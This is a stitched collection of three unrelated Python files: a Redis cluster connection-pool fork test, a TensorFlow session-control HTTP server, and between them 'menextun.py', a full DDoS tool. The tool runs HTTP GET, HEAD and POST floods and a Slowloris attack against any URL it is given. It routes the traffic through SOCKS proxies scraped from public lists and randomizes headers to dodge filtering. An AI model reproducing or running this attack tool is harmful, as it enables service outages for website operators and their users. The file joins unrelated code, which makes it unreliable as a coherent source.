@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_pool(self, max_connections):
"""
A child will create its own connections when using a pool created
by a parent.
"""
pool = ClusterConnectionPool.from_url('redis://localhost:7000',
max_connections=max_connections)
conn = pool.get_random_connection()
main_conn_pid = conn.pid
with exit_callback(pool.release, conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(pool):
with exit_callback(pool.disconnect):
conn = pool.get_random_connection()
assert conn.pid != main_conn_pid
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
proc = multiprocessing.Process(target=target, args=(pool,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# Check that connection is still alive after fork process has exited
# and disconnected the connections in its pool
conn = pool.get_random_connection()
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_close_pool_in_main(self, max_connections):
"""
A child process that uses the same pool as its parent isn't affected
when the parent disconnects all connections within the pool.
"""
pool = ClusterConnectionPool.from_url('redis://localhost:7000',
max_connections=max_connections)
conn = pool.get_random_connection()
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
def target(pool, disconnect_event):
conn = pool.get_random_connection()
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
disconnect_event.wait()
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(pool, ev))
proc.start()
pool.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
def test_redis_client(self, r):
"A redis client created in a parent can also be used in a child"
assert r.ping() is True
def target(client):
assert client.ping() is True
del client
proc = multiprocessing.Process(target=target, args=(r,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
assert r.ping() is True
|
menextun.py
|
#!/usr/bin/python3
#Coded by ViRu
#########################################
# Just a little change #
# -- ViRu #
#########################################
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
import base64
import codecs
print ('''\033[92m
┌────────────────────────────────────────────────────────────────────────────┐
│ __ __ _____ _ _ _______ _______ _ _ _ _ │
│ | \/ | ____| \ | | ____\ \/ /_ _| | | | \ | | │
│ | |\/| | _| | \| | _| \ / | | | | | | \| | │
│ | | | | |___| |\ | |___ / \ | | | |_| | |\ | │
│ |_| |_|_____|_| \_|_____/_/\_\ |_| \___/|_| \_| │
│ C0d3d by ViRu │
│────────────────────────────────────────────────────────────────────────────│
│ Don't attack .gov website │
└────────────────────────────────────────────────────────────────────────────┘
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××\033[0m''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
"https://www.qwant.com/search?q=",
"https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=",
"https://www.google.ad/search?q=",
"https://www.google.ae/search?q=",
"https://www.google.com.af/search?q=",
"https://www.google.com.ag/search?q=",
"https://www.google.com.ai/search?q=",
"https://www.google.al/search?q=",
"https://www.google.am/search?q=",
"https://www.google.co.ao/search?q=",
]
ind_dict = {}
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint
Choice = random.choice
###################################################
def build_threads(mode,thread_num,event,socks_type,ind_rlock):
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "head":
for _ in range(thread_num):
th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def GenReqHeader(method):
global data
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ target + path + "\r\n"
useragent = "User-Agent: " + getuseragent() + "\r\n"
header = referer + useragent + accept + connection + "\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n"
refer = "Referer: http://"+ target + path + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":# You can enable customize data
data = str(random._urandom(16))
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def ParseUrl(original_url):
global target
global path
global port
global protocol
original_url = original_url.strip()
url = ""
path = "/"#default value
port = 80 #default value
protocol = "http"
#http(s)://www.example.com:1337/xxx
if original_url[:7] == "http://":
url = original_url[7:]
elif original_url[:8] == "https://":
url = original_url[8:]
protocol = "https"
#http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx
#print(url) #for debug
tmp = url.split("/")
website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337
check = website.split(":")
if len(check) != 1:#detect the port
port = int(check[1])
else:
if protocol == "https":
port = 443
target = check[0]
if len(tmp) > 1:
path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx
def InputOption(question,options,default):
ans = ""
while ans == "":
ans = str(input(question)).strip().lower()
if ans == "":
ans = default
elif ans not in options:
print("> Please enter the correct option")
ans = ""
continue
return ans
def CheckerOption():
global proxies
N = str(input("> Do you need to get socks list?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
if len(proxies) == 0:
print("> There are no more proxies. Please download a new one.")
sys.exit(1)
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=5):"))
if ms == "":
ms = int(5)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
def SetupIndDict():
global ind_dict
for proxy in proxies:
ind_dict[proxy.strip()] = 0
def OutputToScreen(ind_rlock):
global ind_dict
i = 0
sp_char = ["|","/","-","\\"]
while 1:
if i > 3:
i = 0
print("{:^70}".format("Proxies attacking status"))
print("{:^70}".format("IP:PORT <-> RPS "))
#1. xxx.xxx.xxx.xxx:xxxxx ==> Rps: xxxx
ind_rlock.acquire()
top_num = 0
top10= sorted(ind_dict, key=ind_dict.get, reverse=True)
if len(top10) > 10:
top_num = 10
else:
top_num = len(top10)
for num in range(top_num):
top = "none"
rps = 0
if len(ind_dict) != 0:
top = top10[num]
rps = ind_dict[top]
ind_dict[top] = 0
print("{:^70}".format("{:2d}. {:^22s} | Rps: {:d}".format(num+1,top,rps)))
total = 0
for k,v in ind_dict.items():
total = total + v
ind_dict[k] = 0
ind_rlock.release()
print("{:^70}".format(" ["+sp_char[i]+"] CC attack | Total Rps:"+str(total)))
i+=1
time.sleep(1)
print("\n"*100)
def cc(event,socks_type,ind_rlock):
global ind_dict
header = GenReqHeader("get")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
def head(event,socks_type,ind_rlock):#HEAD MODE
global ind_dict
header = GenReqHeader("head")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break# This part will jump to dirty fix
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:#dirty fix
s.close()
def post(event,socks_type,ind_rlock):
global ind_dict
request = GenReqHeader("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
socket_list=[]
def slow(conn,socks_type):
proxy = Choice(proxies).strip().split(":")
for _ in range(conn):
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
for _ in range(conn - len(socket_list)):
try:
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if int(port) == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms,rlock,):#Proxy checker coded by Leeon123
global nums
global proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
rlock.acquire()
proxies.remove(lines)
rlock.release()
return
err = 0
while True:
if err >= 3:
rlock.acquire()
proxies.remove(lines)
rlock.release()
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
if not sent:
err += 1
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
rlock = threading.RLock()
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,rlock,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,rlock,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
r = requests.get("https://www.socks-proxy.net/",timeout=5)
part = str(r.content)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/v2/?request=getproxies&protocol=socks5&timeout=10000&country=all&simplified=true",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def prevent():
if '.gov' in url :
print("> You can't attack .gov website!")
exit()
def main():
global multiple
global choice
global data
global mode2
global cookies
global brute
global url
print("> Mode: [cc/post/head/slow/check]")
mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc")
url = str(input("> Input the target url:")).strip()
prevent()
ParseUrl(url)
if mode == "post":
mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n")
if mode2 == "y":
data = open(str(input("> Input the file's path:")).strip(),"r",encoding="utf-8", errors='ignore').readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = InputOption("> Customize cookies? (y/n, default=n):",["y","n","yes","no"],"n")
if choice2 == "y":
cookies = str(input("Plese input the cookies:")).strip()
choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5")
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
CheckerOption()
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> Threads(default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
CheckerOption()
if len(proxies) == 0:
print("> There are no more proxies. Please download a new one.")
return
ind_rlock = threading.RLock()
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.setDaemon(True)
th.start()
else:
multiple = str(input("> Input the Magnification(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> Enable boost mode[beta](y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
event = threading.Event()
print("> Building threads...")
SetupIndDict()
build_threads(mode,thread_num,event,socks_type,ind_rlock)
event.clear()
input("Press Enter to continue.")
event.set()
threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start()
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
if __name__ == "__main__":
main()#Coded by ViRu
|
server.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import multiprocessing, urllib, json, threading
import tensorflow as tf
class SessionServer(HTTPServer):
def __init__(self, tensors, session, address="127.0.0.1", port=8084, assign_ops=None, placeholders=None):
"""
Session Server allows Tensor values to be changed while training.
:param tensors: List of Tensors that can be interactively changed.
:param session: Tensorflow session to use.
:param address: Server address.
:param port: Server port.
:param assign_ops Ops that assign values to Tensors. Used in distributed training.
:param placeholders Placeholders for assign ops. Used in distributed training.
:return: None.
"""
super(HTTPServer, self).__init__((address, port), self.RequestHandler)
self.tensors = tensors
self.assign_ops = assign_ops
self.placeholders = placeholders
if not ((assign_ops is None and placeholders is None) or (assign_ops is not None and placeholders is not None)):
raise ValueError("Either specify both assign_ops and placeholders or none.")
self.session = session
manager = multiprocessing.Manager()
self.shared = manager.dict()
self.shared["tensor_names"] = [tensor.name for tensor in tensors]
tensor_dtypes = []
for tensor in tensors:
if tensor.dtype == tf.string or tensor.dtype.name == "string_ref":
tensor_dtypes.append(str)
else:
np_dtype = tensor.dtype.as_numpy_dtype
tensor_dtypes.append(type(np_dtype(0).item()))
self.shared["tensor_dtypes"] = tensor_dtypes
self.shared["last_check_iteration"] = 0
self.events = manager.list()
self.past_events = manager.list()
def check_events(self, iteration):
"""
Check if some event should be triggered.
:param iteration: Current training iteration (global step).
:return: None.
"""
# remember when we last checked
self.shared["last_check_iteration"] = iteration
# check if any event is triggered
events_to_delete = []
for event in sorted(self.events, key=lambda x: x["iteration"], reverse=True):
if event["iteration"] <= iteration:
self.assign_value(event["tensor_name"], event["value"])
events_to_delete.append(self.events.index(event))
for event_idx in sorted(events_to_delete, reverse=True):
self.past_events.append(self.events[event_idx])
del self.events[event_idx]
def assign_value(self, tensor_name, value):
"""
Assign new value to a Tensor.
:param tensor_name: Name of the Tensor to changed.
:param value: New value for the Tensor.
:return: None.
"""
tensor_index = self.shared["tensor_names"].index(tensor_name)
tensor = self.tensors[tensor_index]
if self.assign_ops is None:
self.session.run(tensor.assign(value))
else:
self.session.run(self.assign_ops[tensor_index], feed_dict={
self.placeholders[tensor_index]: value
})
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
"""
Handle a GET request - should return the list of events and other info.
"""
# events and past_events are a ListProxy that isn't JSON serializable => convert it to Python list
json_obj = {
"events": [x for x in self.server.events],
"past_events": [x for x in self.server.past_events],
"tensor_names": self.server.shared["tensor_names"],
"last_check_iteration": int(self.server.shared["last_check_iteration"])
}
json_string = json.dumps(json_obj).encode()
self.send_response(200)
self.end_headers()
self.wfile.write(json_string)
def do_POST(self):
"""
Handle a POST request - add new event.
"""
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
error = False
iteration = None
tensor_name = None
value = None
if "iteration" in post_data and "tensor_name" in post_data and "value" in post_data:
try:
iteration = int(post_data["iteration"][0])
tensor_name = post_data["tensor_name"][0]
if tensor_name in self.server.shared["tensor_names"]:
tensor_index = self.server.shared["tensor_names"].index(tensor_name)
tensor_dtype = self.server.shared["tensor_dtypes"][tensor_index]
value = post_data["value"][0]
value = tensor_dtype(value)
else:
error = True
except ValueError:
error = True
else:
error = True
if not error:
self.add_event(iteration, tensor_name, value)
self.send_response_only(200)
else:
self.send_error(400, "Invalid add event request.")
self.end_headers()
def do_DELETE(self):
"""
Handle a DELETE request - remove an event.
"""
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
error = False
event_idx = None
if "event_idx" in post_data:
event_idx = int(post_data["event_idx"][0])
if event_idx >= len(self.server.events):
error = True
else:
error = True
if not error:
del self.server.events[event_idx]
self.send_response_only(200)
else:
self.send_error(400, "Invalid delete event request.")
self.end_headers()
def add_event(self, iteration, tensor_name, value):
"""
Register an event.
:param iteration: When to trigger the event.
:param tensor_name: Which Tensor to change.
:param value: Value for the Tensor.
:return: None.
"""
self.server.events.append({
"iteration": iteration, "tensor_name": tensor_name, "value": value
})
def log_message(self, format, *args):
return
def run_server(tensors, session, address="127.0.0.1", port=8084, assign_ops=None, placeholders=None):
"""
Run a SessionServer.
:param tensors: Tensors to register.
:param session: Current Tensorflow session.
:param address: Server address.
:param port: Server port.
:return: Tuple - server object and a its thread.
"""
httpd = SessionServer(tensors, session, address=address, port=port, assign_ops=assign_ops, placeholders=placeholders)
def worker(server):
server.serve_forever()
thread = threading.Thread(target=worker, args=(httpd,), daemon=True)
thread.start()
return httpd, thread
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.